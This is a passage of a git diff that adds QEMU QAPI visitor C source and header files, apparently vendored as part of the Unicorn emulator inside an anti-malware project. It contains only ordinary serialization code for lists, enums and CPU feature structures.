prev, &err)) != NULL; + prev = &i) { + strList *native_i = (strList *)i; + visit_type_str(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_intList(Visitor *m, intList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + intList *native_i = (intList *)i; + visit_type_int(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_numberList(Visitor *m, numberList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + numberList *native_i = (numberList *)i; + visit_type_number(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_boolList(Visitor *m, boolList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + boolList *native_i = (boolList *)i; + visit_type_bool(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int8List(Visitor *m, int8List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int8List *native_i = (int8List *)i; + visit_type_int8(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int16List(Visitor *m, int16List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int16List *native_i = (int16List *)i; + visit_type_int16(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int32List(Visitor *m, int32List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int32List *native_i = (int32List *)i; + visit_type_int32(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int64List(Visitor *m, int64List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int64List *native_i = (int64List *)i; + visit_type_int64(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint8List(Visitor *m, uint8List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint8List *native_i = (uint8List *)i; + visit_type_uint8(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint16List(Visitor *m, uint16List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint16List *native_i = (uint16List *)i; + visit_type_uint16(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint32List(Visitor *m, uint32List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint32List *native_i = (uint32List *)i; + visit_type_uint32(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint64List(Visitor *m, uint64List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint64List *native_i = (uint64List *)i; + visit_type_uint64(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_ErrorClassList(Visitor *m, ErrorClassList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + ErrorClassList *native_i = (ErrorClassList *)i; + visit_type_ErrorClass(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_ErrorClass(Visitor *m, ErrorClass *obj, const char *name, Error **errp) +{ + visit_type_enum(m, (int *)obj, ErrorClass_lookup, "ErrorClass", name, errp); +} + +void visit_type_X86CPURegister32List(Visitor *m, X86CPURegister32List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + X86CPURegister32List *native_i = (X86CPURegister32List *)i; + visit_type_X86CPURegister32(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_X86CPURegister32(Visitor *m, X86CPURegister32 *obj, const char *name, Error **errp) +{ + visit_type_enum(m, (int *)obj, X86CPURegister32_lookup, "X86CPURegister32", name, errp); +} + +static void visit_type_X86CPUFeatureWordInfo_fields(Visitor *m, X86CPUFeatureWordInfo **obj, Error **errp) +{ + Error *err = NULL; + visit_type_int(m, &(*obj)->cpuid_input_eax, "cpuid-input-eax", &err); + if (err) { + goto out; + } + visit_optional(m, &(*obj)->has_cpuid_input_ecx, "cpuid-input-ecx", &err); + if (!err && (*obj)->has_cpuid_input_ecx) { + visit_type_int(m, &(*obj)->cpuid_input_ecx, "cpuid-input-ecx", &err); + } + if (err) { + goto out; + } + visit_type_X86CPURegister32(m, &(*obj)->cpuid_register, "cpuid-register", &err); + if (err) { + goto out; + } + visit_type_int(m, &(*obj)->features, "features", &err); + if (err) { + goto out; + } + +out: + error_propagate(errp, err); +} + +void visit_type_X86CPUFeatureWordInfo(Visitor *m, X86CPUFeatureWordInfo **obj, const char *name, Error **errp) +{ + Error *err = NULL; + + visit_start_struct(m, (void **)obj, "X86CPUFeatureWordInfo", name, sizeof(X86CPUFeatureWordInfo), &err); + if (!err) { + if (*obj) { + visit_type_X86CPUFeatureWordInfo_fields(m, obj, errp); + } + visit_end_struct(m, &err); + } + error_propagate(errp, err); +} + +void visit_type_X86CPUFeatureWordInfoList(Visitor *m, X86CPUFeatureWordInfoList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + X86CPUFeatureWordInfoList *native_i = (X86CPUFeatureWordInfoList *)i; + visit_type_X86CPUFeatureWordInfo(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-visit.h b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-visit.h new file mode 100644 index 0000000..51bd088 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-visit.h @@ -0,0 +1,51 @@ +/* THIS FILE IS AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI visitor functions + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QAPI_VISIT_H +#define QAPI_VISIT_H + +#include "qapi/visitor.h" +#include "qapi-types.h" + + +#ifndef QAPI_VISIT_BUILTIN_VISITOR_DECL_H +#define QAPI_VISIT_BUILTIN_VISITOR_DECL_H + +void visit_type_strList(Visitor *m, strList **obj, const char *name, Error **errp); +void visit_type_intList(Visitor *m, intList **obj, const char *name, Error **errp); +void visit_type_numberList(Visitor *m, numberList **obj, const char *name, Error **errp); +void visit_type_boolList(Visitor *m, boolList **obj, const char *name, Error **errp); +void visit_type_int8List(Visitor *m, int8List **obj, const char *name, Error **errp); +void visit_type_int16List(Visitor *m, int16List **obj, const char *name, Error **errp); +void visit_type_int32List(Visitor *m, int32List **obj, const char *name, Error **errp); +void visit_type_int64List(Visitor *m, int64List **obj, const char *name, Error **errp); +void visit_type_uint8List(Visitor *m, uint8List **obj, const char *name, Error **errp); +void visit_type_uint16List(Visitor *m, uint16List **obj, const char *name, Error **errp); +void visit_type_uint32List(Visitor *m, uint32List **obj, const char *name, Error **errp); +void visit_type_uint64List(Visitor *m, uint64List **obj, const char *name, Error **errp); + +#endif /* QAPI_VISIT_BUILTIN_VISITOR_DECL_H */ + + +void visit_type_ErrorClass(Visitor *m, ErrorClass *obj, const char *name, Error **errp); +void visit_type_ErrorClassList(Visitor *m, ErrorClassList **obj, const char *name, Error **errp); + +void visit_type_X86CPURegister32(Visitor *m, X86CPURegister32 *obj, const char *name, Error **errp); +void visit_type_X86CPURegister32List(Visitor *m, X86CPURegister32List **obj, const char *name, Error **errp); + +void visit_type_X86CPUFeatureWordInfo(Visitor *m, X86CPUFeatureWordInfo **obj, const char *name, Error **errp); +void visit_type_X86CPUFeatureWordInfoList(Visitor *m, X86CPUFeatureWordInfoList **obj, const char *name, Error **errp); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/Makefile.objs new file mode 100644 index 0000000..00e40d6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/Makefile.objs @@ -0,0 +1,3 @@ +util-obj-y = qapi-visit-core.o qapi-dealloc-visitor.o qmp-input-visitor.o +util-obj-y += qmp-output-visitor.o +util-obj-y += string-input-visitor.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qapi-dealloc-visitor.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qapi-dealloc-visitor.c new file mode 100644 index 0000000..a14a1c7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qapi-dealloc-visitor.c @@ -0,0 +1,224 @@ +/* + * Dealloc Visitor + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Michael Roth + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qapi/dealloc-visitor.h" +#include "qemu/queue.h" +#include "qemu-common.h" +#include "qapi/qmp/types.h" +#include "qapi/visitor-impl.h" + +typedef struct StackEntry +{ + void *value; + bool is_list_head; + QTAILQ_ENTRY(StackEntry) node; +} StackEntry; + +struct QapiDeallocVisitor +{ + Visitor visitor; + QTAILQ_HEAD(, StackEntry) stack; + bool is_list_head; +}; + +static QapiDeallocVisitor *to_qov(Visitor *v) +{ + return container_of(v, QapiDeallocVisitor, visitor); +} + +static void qapi_dealloc_push(QapiDeallocVisitor *qov, void *value) +{ + StackEntry *e = g_malloc0(sizeof(*e)); + + e->value = value; + + /* see if we're just pushing a list head tracker */ + if (value == NULL) { + e->is_list_head = true; + } + QTAILQ_INSERT_HEAD(&qov->stack, e, node); +} + +static void *qapi_dealloc_pop(QapiDeallocVisitor *qov) +{ + StackEntry *e = QTAILQ_FIRST(&qov->stack); + QObject *value; + QTAILQ_REMOVE(&qov->stack, e, node); + value = e->value; + g_free(e); + return value; +} + +static void qapi_dealloc_start_struct(Visitor *v, void **obj, const char *kind, + const char *name, size_t unused, + Error **errp) +{ + QapiDeallocVisitor *qov = to_qov(v); + qapi_dealloc_push(qov, obj); +} + +static void qapi_dealloc_end_struct(Visitor *v, Error **errp) +{ + QapiDeallocVisitor *qov = to_qov(v); + void **obj = qapi_dealloc_pop(qov); + if (obj) { + g_free(*obj); + } +} + +static void qapi_dealloc_start_implicit_struct(Visitor *v, + void **obj, + size_t size, + Error **errp) +{ + QapiDeallocVisitor *qov = to_qov(v); + qapi_dealloc_push(qov, obj); +} + +static void qapi_dealloc_end_implicit_struct(Visitor *v, Error **errp) +{ + QapiDeallocVisitor *qov = to_qov(v); + void **obj = qapi_dealloc_pop(qov); + if (obj) { + g_free(*obj); + } +} + +static void qapi_dealloc_start_list(Visitor *v, const char *name, Error **errp) +{ + QapiDeallocVisitor *qov = to_qov(v); + qapi_dealloc_push(qov, NULL); +} + +static GenericList *qapi_dealloc_next_list(Visitor *v, GenericList **listp, + Error **errp) +{ + GenericList *list = *listp; + QapiDeallocVisitor *qov = to_qov(v); + StackEntry *e = QTAILQ_FIRST(&qov->stack); + + if (e && e->is_list_head) { + e->is_list_head = false; + return list; + } + + if (list) { + list = list->next; + g_free(*listp); + return list; + } + + return NULL; +} + +static void qapi_dealloc_end_list(Visitor *v, Error **errp) +{ + QapiDeallocVisitor *qov = to_qov(v); + void *obj = qapi_dealloc_pop(qov); + assert(obj == NULL); /* should've been list head tracker with no payload */ +} + +static void qapi_dealloc_type_str(Visitor *v, char **obj, const char *name, + Error **errp) +{ + if (obj) { + g_free(*obj); + } +} + +static void qapi_dealloc_type_int(Visitor *v, int64_t *obj, const char *name, + Error **errp) +{ +} + +static void qapi_dealloc_type_bool(Visitor *v, bool *obj, const char *name, + Error **errp) +{ +} + +static void qapi_dealloc_type_number(Visitor *v, double *obj, const char *name, + Error **errp) +{ +} + +static void qapi_dealloc_type_size(Visitor *v, uint64_t *obj, const char *name, + Error **errp) +{ +} + +static void qapi_dealloc_type_enum(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, + Error **errp) +{ +} + +/* If there's no data present, the dealloc visitor has nothing to free. + * Thus, indicate to visitor code that the subsequent union fields can + * be skipped. This is not an error condition, since the cleanup of the + * rest of an object can continue unhindered, so leave errp unset in + * these cases. + * + * NOTE: In cases where we're attempting to deallocate an object that + * may have missing fields, the field indicating the union type may + * be missing. In such a case, it's possible we don't have enough + * information to differentiate data_present == false from a case where + * data *is* present but happens to be a scalar with a value of 0. + * This is okay, since in the case of the dealloc visitor there's no + * work that needs to done in either situation. + * + * The current inability in QAPI code to more thoroughly verify a union + * type in such cases will likely need to be addressed if we wish to + * implement this interface for other types of visitors in the future, + * however. + */ +static bool qapi_dealloc_start_union(Visitor *v, bool data_present, + Error **errp) +{ + return data_present; +} + +Visitor *qapi_dealloc_get_visitor(QapiDeallocVisitor *v) +{ + return &v->visitor; +} + +void qapi_dealloc_visitor_cleanup(QapiDeallocVisitor *v) +{ + g_free(v); +} + +QapiDeallocVisitor *qapi_dealloc_visitor_new(void) +{ + QapiDeallocVisitor *v; + + v = g_malloc0(sizeof(*v)); + + v->visitor.start_struct = qapi_dealloc_start_struct; + v->visitor.end_struct = qapi_dealloc_end_struct; + v->visitor.start_implicit_struct = qapi_dealloc_start_implicit_struct; + v->visitor.end_implicit_struct = qapi_dealloc_end_implicit_struct; + v->visitor.start_list = qapi_dealloc_start_list; + v->visitor.next_list = qapi_dealloc_next_list; + v->visitor.end_list = qapi_dealloc_end_list; + v->visitor.type_enum = qapi_dealloc_type_enum; + v->visitor.type_int = qapi_dealloc_type_int; + v->visitor.type_bool = qapi_dealloc_type_bool; + v->visitor.type_str = qapi_dealloc_type_str; + v->visitor.type_number = qapi_dealloc_type_number; + v->visitor.type_size = qapi_dealloc_type_size; + v->visitor.start_union = qapi_dealloc_start_union; + + QTAILQ_INIT(&v->stack); + + return v; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qapi-visit-core.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qapi-visit-core.c new file mode 100644 index 0000000..5f91840 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qapi-visit-core.c @@ -0,0 +1,313 @@ +/* + * Core Definitions for QAPI Visitor Classes + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qemu-common.h" +#include "qapi/qmp/qobject.h" +#include "qapi/qmp/qerror.h" +#include "qapi/visitor.h" +#include "qapi/visitor-impl.h" + +void visit_start_struct(Visitor *v, void **obj, const char *kind, + const char *name, size_t size, Error **errp) +{ + v->start_struct(v, obj, kind, name, size, errp); +} + +void visit_end_struct(Visitor *v, Error **errp) +{ + v->end_struct(v, errp); +} + +void visit_start_implicit_struct(Visitor *v, void **obj, size_t size, + Error **errp) +{ + if (v->start_implicit_struct) { + v->start_implicit_struct(v, obj, size, errp); + } +} + +void visit_end_implicit_struct(Visitor *v, Error **errp) +{ + if (v->end_implicit_struct) { + v->end_implicit_struct(v, errp); + } +} + +void visit_start_list(Visitor *v, const char *name, Error **errp) +{ + v->start_list(v, name, errp); +} + +GenericList *visit_next_list(Visitor *v, GenericList **list, Error **errp) +{ + return v->next_list(v, list, errp); +} + +void visit_end_list(Visitor *v, Error **errp) +{ + v->end_list(v, errp); +} + +bool visit_start_union(Visitor *v, bool data_present, Error **errp) +{ + if (v->start_union) { + return v->start_union(v, data_present, errp); + } + return true; +} + +void visit_end_union(Visitor *v, bool data_present, Error **errp) +{ + if (v->end_union) { + v->end_union(v, data_present, errp); + } +} + +void visit_optional(Visitor *v, bool *present, const char *name, + Error **errp) +{ + if (v->optional) { + v->optional(v, present, name, errp); + } +} + +void visit_get_next_type(Visitor *v, int *obj, const int *qtypes, + const char *name, Error **errp) +{ + if (v->get_next_type) { + v->get_next_type(v, obj, qtypes, name, errp); + } +} + +void visit_type_enum(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, Error **errp) +{ + v->type_enum(v, obj, strings, kind, name, errp); +} + +void visit_type_int(Visitor *v, int64_t *obj, const char *name, Error **errp) +{ + v->type_int(v, obj, name, errp); +} + +void visit_type_uint8(Visitor *v, uint8_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_uint8) { + v->type_uint8(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + if (value < 0 || value > UINT8_MAX) { + error_set(errp, QERR_INVALID_PARAMETER_VALUE, name ? name : "null", + "uint8_t"); + return; + } + *obj = (uint8_t)value; + } +} + +void visit_type_uint16(Visitor *v, uint16_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_uint16) { + v->type_uint16(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + if (value < 0 || value > UINT16_MAX) { + error_set(errp, QERR_INVALID_PARAMETER_VALUE, name ? name : "null", + "uint16_t"); + return; + } + *obj = (uint16_t)value; + } +} + +void visit_type_uint32(Visitor *v, uint32_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_uint32) { + v->type_uint32(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + if (value < 0 || value > UINT32_MAX) { + error_set(errp, QERR_INVALID_PARAMETER_VALUE, name ? name : "null", + "uint32_t"); + return; + } + *obj = (uint32_t)value; + } +} + +void visit_type_uint64(Visitor *v, uint64_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_uint64) { + v->type_uint64(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + *obj = value; + } +} + +void visit_type_int8(Visitor *v, int8_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_int8) { + v->type_int8(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + if (value < INT8_MIN || value > INT8_MAX) { + error_set(errp, QERR_INVALID_PARAMETER_VALUE, name ? name : "null", + "int8_t"); + return; + } + *obj = (int8_t)value; + } +} + +void visit_type_int16(Visitor *v, int16_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_int16) { + v->type_int16(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + if (value < INT16_MIN || value > INT16_MAX) { + error_set(errp, QERR_INVALID_PARAMETER_VALUE, name ? name : "null", + "int16_t"); + return; + } + *obj = (int16_t)value; + } +} + +void visit_type_int32(Visitor *v, int32_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_int32) { + v->type_int32(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + if (value < INT32_MIN || value > INT32_MAX) { + error_set(errp, QERR_INVALID_PARAMETER_VALUE, name ? name : "null", + "int32_t"); + return; + } + *obj = (int32_t)value; + } +} + +void visit_type_int64(Visitor *v, int64_t *obj, const char *name, Error **errp) +{ + if (v->type_int64) { + v->type_int64(v, obj, name, errp); + } else { + v->type_int(v, obj, name, errp); + } +} + +void visit_type_size(Visitor *v, uint64_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_size) { + v->type_size(v, obj, name, errp); + } else if (v->type_uint64) { + v->type_uint64(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + *obj = value; + } +} + +void visit_type_bool(Visitor *v, bool *obj, const char *name, Error **errp) +{ + v->type_bool(v, obj, name, errp); +} + +void visit_type_str(Visitor *v, char **obj, const char *name, Error **errp) +{ + v->type_str(v, obj, name, errp); +} + +void visit_type_number(Visitor *v, double *obj, const char *name, Error **errp) +{ + v->type_number(v, obj, name, errp); +} + +void output_type_enum(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, + Error **errp) +{ + int i = 0; + int value = *obj; + char *enum_str; + + assert(strings); + while (strings[i++] != NULL); + if (value < 0 || value >= i - 1) { + error_set(errp, QERR_INVALID_PARAMETER, name ? name : "null"); + return; + } + + enum_str = (char *)strings[value]; + visit_type_str(v, &enum_str, name, errp); +} + +void input_type_enum(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, + Error **errp) +{ + Error *local_err = NULL; + int64_t value = 0; + char *enum_str; + + assert(strings); + + visit_type_str(v, &enum_str, name, &local_err); + if (local_err) { + error_propagate(errp, local_err); + return; + } + + while (strings[value] != NULL) { + if (strcmp(strings[value], enum_str) == 0) { + break; + } + value++; + } + + if (strings[value] == NULL) { + error_set(errp, QERR_INVALID_PARAMETER, enum_str); + g_free(enum_str); + return; + } + + g_free(enum_str); + *obj = (int)value; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qmp-input-visitor.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qmp-input-visitor.c new file mode 100644 index 0000000..33dd754 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qmp-input-visitor.c @@ -0,0 +1,349 @@ +/* + * Input Visitor + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qapi/qmp-input-visitor.h" +#include "qapi/visitor-impl.h" +#include "qemu/queue.h" +#include "qemu-common.h" +#include "qapi/qmp/types.h" +#include "qapi/qmp/qerror.h" + +#define QIV_STACK_SIZE 1024 + +typedef struct StackObject +{ + QObject *obj; + const QListEntry *entry; + GHashTable *h; +} StackObject; + +struct QmpInputVisitor +{ + Visitor visitor; + StackObject stack[QIV_STACK_SIZE]; + int nb_stack; + bool strict; +}; + +static QmpInputVisitor *to_qiv(Visitor *v) +{ + return container_of(v, QmpInputVisitor, visitor); +} + +static QObject *qmp_input_get_object(QmpInputVisitor *qiv, + const char *name, + bool consume) +{ + QObject *qobj = qiv->stack[qiv->nb_stack - 1].obj; + + if (qobj) { + if (name && qobject_type(qobj) == QTYPE_QDICT) { + if (qiv->stack[qiv->nb_stack - 1].h && consume) { + g_hash_table_remove(qiv->stack[qiv->nb_stack - 1].h, name); + } + return qdict_get(qobject_to_qdict(qobj), name); + } else if (qiv->stack[qiv->nb_stack - 1].entry) { + return qlist_entry_obj(qiv->stack[qiv->nb_stack - 1].entry); + } + } + + return qobj; +} + +static void qdict_add_key(const char *key, QObject *obj, void *opaque) +{ + GHashTable *h = opaque; + g_hash_table_insert(h, (gpointer) key, NULL); +} + +static void qmp_input_push(QmpInputVisitor *qiv, QObject *obj, Error **errp) +{ + GHashTable *h; + + if (qiv->nb_stack >= QIV_STACK_SIZE) { + error_setg(errp, "An internal buffer overran"); + return; + } + + qiv->stack[qiv->nb_stack].obj = obj; + qiv->stack[qiv->nb_stack].entry = NULL; + qiv->stack[qiv->nb_stack].h = NULL; + + if (qiv->strict && qobject_type(obj) == QTYPE_QDICT) { + h = g_hash_table_new(g_str_hash, g_str_equal); + qdict_iter(qobject_to_qdict(obj), qdict_add_key, h); + qiv->stack[qiv->nb_stack].h = h; + } + + qiv->nb_stack++; +} + +/** Only for qmp_input_pop. */ +static gboolean always_true(gpointer key, gpointer val, gpointer user_pkey) +{ + *(const char **)user_pkey = (const char *)key; + return TRUE; +} + +static void qmp_input_pop(QmpInputVisitor *qiv, Error **errp) +{ + assert(qiv->nb_stack > 0); + + if (qiv->strict) { + GHashTable * const top_ht = qiv->stack[qiv->nb_stack - 1].h; + if (top_ht) { + if (g_hash_table_size(top_ht)) { + const char *key; + g_hash_table_find(top_ht, always_true, (gpointer)&key); + error_set(errp, QERR_QMP_EXTRA_MEMBER, key); + } + g_hash_table_unref(top_ht); + } + } + + qiv->nb_stack--; +} + +static void qmp_input_start_struct(Visitor *v, void **obj, const char *kind, + const char *name, size_t size, Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, true); + Error *err = NULL; + + if (!qobj || qobject_type(qobj) != QTYPE_QDICT) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "QDict"); + return; + } + + qmp_input_push(qiv, qobj, &err); + if (err) { + error_propagate(errp, err); + return; + } + + if (obj) { + *obj = g_malloc0(size); + } +} + +static void qmp_input_end_struct(Visitor *v, Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + + qmp_input_pop(qiv, errp); +} + +static void qmp_input_start_implicit_struct(Visitor *v, void **obj, + size_t size, Error **errp) +{ + if (obj) { + *obj = g_malloc0(size); + } +} + +static void qmp_input_end_implicit_struct(Visitor *v, Error **errp) +{ +} + +static void qmp_input_start_list(Visitor *v, const char *name, Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, true); + + if (!qobj || qobject_type(qobj) != QTYPE_QLIST) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "list"); + return; + } + + qmp_input_push(qiv, qobj, errp); +} + +static GenericList *qmp_input_next_list(Visitor *v, GenericList **list, + Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + GenericList *entry; + StackObject *so = &qiv->stack[qiv->nb_stack - 1]; + bool first; + + if (so->entry == NULL) { + so->entry = qlist_first(qobject_to_qlist(so->obj)); + first = true; + } else { + so->entry = qlist_next(so->entry); + first = false; + } + + if (so->entry == NULL) { + return NULL; + } + + entry = g_malloc0(sizeof(*entry)); + if (first) { + *list = entry; + } else { + (*list)->next = entry; + } + + return entry; +} + +static void qmp_input_end_list(Visitor *v, Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + + qmp_input_pop(qiv, errp); +} + +static void qmp_input_get_next_type(Visitor *v, int *kind, const int *qobjects, + const char *name, Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, false); + + if (!qobj) { + error_set(errp, QERR_MISSING_PARAMETER, name ? name : "null"); + return; + } + *kind = qobjects[qobject_type(qobj)]; +} + +static void qmp_input_type_int(Visitor *v, int64_t *obj, const char *name, + Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, true); + + if (!qobj || qobject_type(qobj) != QTYPE_QINT) { + error_set(errp, QERR_INVALID_PARAMETER_TYPE, name ? name : "null", + "integer"); + return; + } + + *obj = qint_get_int(qobject_to_qint(qobj)); +} + +static void qmp_input_type_bool(Visitor *v, bool *obj, const char *name, + Error **errp) +{ + QmpInputVisitor *qiv = to_qiv(v); + QObject *qobj = qmp_input_get_object(qiv, name, true); + + if (!qobj || qobject_type(qobj) != QTYPE_QBOOL) { + error_set(errp, 